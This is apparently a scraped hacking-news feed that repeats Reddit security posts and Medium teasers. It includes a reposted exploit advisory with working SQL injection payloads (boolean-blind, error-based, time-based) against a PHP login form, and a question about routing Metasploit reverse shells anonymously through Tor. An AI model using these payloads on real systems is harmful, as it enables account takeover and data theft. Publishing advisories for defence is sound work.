Hats Finance is introducing gamified vaults to the mix, allowing developers, white hats and security experts to test their solidity…Continue reading on Medium » (https://hatsfinance.medium.com/gamified-vaults-play-find-get-paid-e1dd769a9adb?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Gamified Vaults: Play, Find, Get Paid
Hats Finance is introducing gamified vaults to the mix, allowing developers, white hats and security experts to test their Solidity…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Home Clean Service System 1.0 SQL Injection
https://3.bp.blogspot.com/-UEPmQpzFyCs/WWlvQSuTgiI/AAAAAAAAINA/LFaHvgtClFA67K--PZO5ZJSS69Dsl8UBACLcBGAs/s1600/h31.png
Home Clean Service System version 1.0 suffers from a remote SQL injection vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Home Clean Service System 1.0 SQL Injection
https://3.bp.blogspot.com/-UEPmQpzFyCs/WWlvQSuTgiI/AAAAAAAAINA/LFaHvgtClFA67K--PZO5ZJSS69Dsl8UBACLcBGAs/s1600/h31.png
Home Clean Service System version 1.0 suffers from a remote SQL injection vulnerability.
SHA-256 |
713a953a97cc2b254906ef14b96aecd818ac74f87d3c6e66fe86d43c4f287826Download
## Title: Home Clean Service System v1.0 - 2022 SQLi
## Author: nu11secur1ty
## Date: 04.27.2022
## Vendor: https://www.sourcecodester.com/users/acetech
## Software: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System
## Description:
The `password` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the password parameter, and a database
error message was returned.
Two single quotes were then submitted and the error message disappeared.
The attacker can take administrator account control and also of all
accounts on this system, also the malicious user can download all
information about this system.
Status: CRITICAL
[+] Payloads:
```mysql
---
Parameter: MULTIPART email ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="email"
uufQHiPr@namaikatiputkata.net' OR NOT 6564=6564-- aWQp
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="login"
------WebKitFormBoundary8kMPLwTOJeesgEBx--
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="email"
uufQHiPr@namaikatiputkata.net' AND (SELECT 6279 FROM(SELECT
COUNT(*),CONCAT(0x7176716271,(SELECT
(ELT(6279=6279,1))),0x716a767871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- LSfT
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="login"
------WebKitFormBoundary8kMPLwTOJeesgEBx--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="email"
uufQHiPr@namaikatiputkata.net' AND (SELECT 4830 FROM
(SELECT(SLEEP(5)))kgBM)-- GxTm
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="login"
------WebKitFormBoundary8kMPLwTOJeesgEBx--
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System)
## Proof and Exploit:
[href](https://streamable.com/l107o6)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Home Clean Service System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
What infosec forums do you use?
https://www.reddit.com/r/Pentesting/comments/ue19iu/what_infosec_forums_do_you_use/
submitted by /u/tmedichi1 (https://www.reddit.com/user/tmedichi1)
[link] (https://www.reddit.com/r/Pentesting/comments/ue19iu/what_infosec_forums_do_you_use/) [comments] (https://www.reddit.com/r/Pentesting/comments/ue19iu/what_infosec_forums_do_you_use/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/ue19iu/what_infosec_forums_do_you_use/
submitted by /u/tmedichi1 (https://www.reddit.com/user/tmedichi1)
[link] (https://www.reddit.com/r/Pentesting/comments/ue19iu/what_infosec_forums_do_you_use/) [comments] (https://www.reddit.com/r/Pentesting/comments/ue19iu/what_infosec_forums_do_you_use/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
What infosec forums do you use?
Posted in r/Pentesting by u/tmedichi1 • 1 point and 0 comments
hacking: security in practice
Legality Question
I have old accounts that are still accessible with loads of personal data and was wondering what the legality of hacking in to delete these accounts would be. They are owned by my old school and an old employer and both have not responded when I asked them to delete it
submitted by /u/Gold-Advertising-137
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Legality Question
I have old accounts that are still accessible with loads of personal data and was wondering what the legality of hacking in to delete these accounts would be. They are owned by my old school and an old employer and both have not responded when I asked them to delete it
submitted by /u/Gold-Advertising-137
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Legality Question
I have old accounts that are still accessible with loads of personal data and was wondering what the legality of hacking in to delete these...
hacking: security in practice
What to Set LHOSTS to in Metasploit so Traffic is Directed Back to Attacking Device while using Tor Proxychains?
I haven't slept in 2 days so forgive me if this sounds like gibberish. Also new to Metasploit...
So, lets say you're delivering a payload (reverse shell for example) over any non local network while using tor proxychains to remain hidden. How should one go about setting the LHOSTS? If one were to set it to the TOR exit node address obviously that's not going to send that traffic back to the attacking device right? If one wanted to remain anonymous how can one route that connection back through proxychains? Delivering the payload through proxychains I understand, but sending the session info back through I do not understand.
Sorry if this is silly. diving into more beginner-intermediate stuff and feeling really lost. Also if anyone has good resources on chaining Metasploit payloads together that would be really appreciated!
submitted by /u/Sarahthegun
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
What to Set LHOSTS to in Metasploit so Traffic is Directed Back to Attacking Device while using Tor Proxychains?
I haven't slept in 2 days so forgive me if this sounds like gibberish. Also new to Metasploit...
So, lets say you're delivering a payload (reverse shell for example) over any non local network while using tor proxychains to remain hidden. How should one go about setting the LHOSTS? If one were to set it to the TOR exit node address obviously that's not going to send that traffic back to the attacking device right? If one wanted to remain anonymous how can one route that connection back through proxychains? Delivering the payload through proxychains I understand, but sending the session info back through I do not understand.
Sorry if this is silly. diving into more beginner-intermediate stuff and feeling really lost. Also if anyone has good resources on chaining Metasploit payloads together that would be really appreciated!
submitted by /u/Sarahthegun
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
What to Set LHOSTS to in Metasploit so Traffic is Directed Back to...
I haven't slept in 2 days so forgive me if this sounds like gibberish. Also new to Metasploit... So, lets say you're delivering a payload...
hacking: security in practice
is Flipper Zero worth the money people are listing on ebay?
it's a nifty little tool, i admit, and i played with one so i know first hand it's valuable, but some of these auctions are insane. the prices are ranging from $10 to $1500. i'm interested in getting one but it'd difficult to discern what it's actually worth without some more opinions.
thoughts on the value of this thing?
submitted by /u/nohupt
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
is Flipper Zero worth the money people are listing on ebay?
it's a nifty little tool, i admit, and i played with one so i know first hand it's valuable, but some of these auctions are insane. the prices are ranging from $10 to $1500. i'm interested in getting one but it'd difficult to discern what it's actually worth without some more opinions.
thoughts on the value of this thing?
submitted by /u/nohupt
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
is Flipper Zero worth the money people are listing on ebay?
it's a nifty little tool, i admit, and i played with one so i know first hand it's valuable, but some of these auctions are insane. the prices are...
hacking: security in practice
Are hardware based security keys the best security we can have?
Like when comparing to Authenticator apps how much better are security keys?
submitted by /u/Princet2001
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Are hardware based security keys the best security we can have?
Like when comparing to Authenticator apps how much better are security keys?
submitted by /u/Princet2001
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Are hardware based security keys the best security we can have?
Like when comparing to Authenticator apps how much better are security keys?
hacking: security in practice
Hacking/Jailbreaking MP3 Player?
I have an MP3 player which clearly runs a very capable android operating system. It lets you add files via USB, including if they're APK's or some other sort of executable but attempting to open them gives this error:
Install blocked For security your phone is set to block installation from apps obtained from unknown sources
Is there a way around this? Here is the Amazon link to the specific MP3 player I have
Edit:: There's nothing in settings to allow apps from unknown sources (the company that made the MP3 player must've disabled that setting)
submitted by /u/--Explosion--
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hacking/Jailbreaking MP3 Player?
I have an MP3 player which clearly runs a very capable android operating system. It lets you add files via USB, including if they're APK's or some other sort of executable but attempting to open them gives this error:
Install blocked For security your phone is set to block installation from apps obtained from unknown sources
Is there a way around this? Here is the Amazon link to the specific MP3 player I have
Edit:: There's nothing in settings to allow apps from unknown sources (the company that made the MP3 player must've disabled that setting)
submitted by /u/--Explosion--
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Hacking/Jailbreaking MP3 Player?
I have an MP3 player which clearly runs a very capable android operating system. It lets you add files via USB, including if they're APK's or some...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Hello World - elektroThing 🚀
submitted by /u/Loud-Consideration-2
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hello World - elektroThing 🚀
submitted by /u/Loud-Consideration-2
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Hello World - elektroThing 🚀
Posted in r/hacking by u/Loud-Consideration-2 • 1 point and 0 comments
Deep Web
how to stay safe on the deep web?
i just want some info on how to stay safe while browsing. any info on how i can stay away from bad sites?
submitted by /u/YoonminLife
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
how to stay safe on the deep web?
i just want some info on how to stay safe while browsing. any info on how i can stay away from bad sites?
submitted by /u/YoonminLife
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
how to stay safe on the deep web?
i just want some info on how to stay safe while browsing. any info on how i can stay away from bad sites?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to be a hacker: The ultimate guide to ethical hacking
https://cdn-images-1.medium.com/max/2600/1*-alj4tMD85b5g4T5ca7-RA.jpeg
In this article ill tell you all about hacking. we will also discuss how we can become a successful ethical hacker and what skills are…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How to be a hacker: The ultimate guide to ethical hacking
https://cdn-images-1.medium.com/max/2600/1*-alj4tMD85b5g4T5ca7-RA.jpeg
In this article ill tell you all about hacking. we will also discuss how we can become a successful ethical hacker and what skills are…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to be a hacker: The ultimate guide to ethical hacking
In this article ill tell you all about hacking. we will also discuss how we can become a successful ethical hacker and what skills are…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How Cybersecurity Risks Must Be Fixed to Build Trust in Technology Innovation
https://cdn-images-1.medium.com/max/960/1*Nb4YnfrSTFPn_sRWx2yJcg.png
Thanks to DynamicCISO for a great discussion about the changing landscape of cybersecurity and how we must all adapt to drive trust into…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How Cybersecurity Risks Must Be Fixed to Build Trust in Technology Innovation
https://cdn-images-1.medium.com/max/960/1*Nb4YnfrSTFPn_sRWx2yJcg.png
Thanks to DynamicCISO for a great discussion about the changing landscape of cybersecurity and how we must all adapt to drive trust into…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How Cybersecurity Risks Must Be Fixed to Build Trust in Technology Innovation
Thanks to DynamicCISO for a great discussion about the changing landscape of cybersecurity and how we must all adapt to drive trust into…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Download kali linux live boot OS file free and with fast speed. Hacking and cyber operating system…
General information
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Download kali linux live boot OS file free and with fast speed. Hacking and cyber operating system…
General information
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Download kali linux live boot OS file free and with fast speed. Hacking and cyber operating system…
General information
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Your WordPress Site Has Been Hacked: Now What?
https://cdn-images-1.medium.com/max/2271/1*nBwqROC1Tu3aEtPJ2itaig.jpeg
Here’s a disturbing fact: stats show that almost one out of every six WordPress-powered sites are vulnerable to attacks. More than half a…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Your WordPress Site Has Been Hacked: Now What?
https://cdn-images-1.medium.com/max/2271/1*nBwqROC1Tu3aEtPJ2itaig.jpeg
Here’s a disturbing fact: stats show that almost one out of every six WordPress-powered sites are vulnerable to attacks. More than half a…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Your WordPress Site Has Been Hacked: Now What?
Here’s a disturbing fact: stats show that almost one out of every six WordPress-powered sites are vulnerable to attacks. More than half a…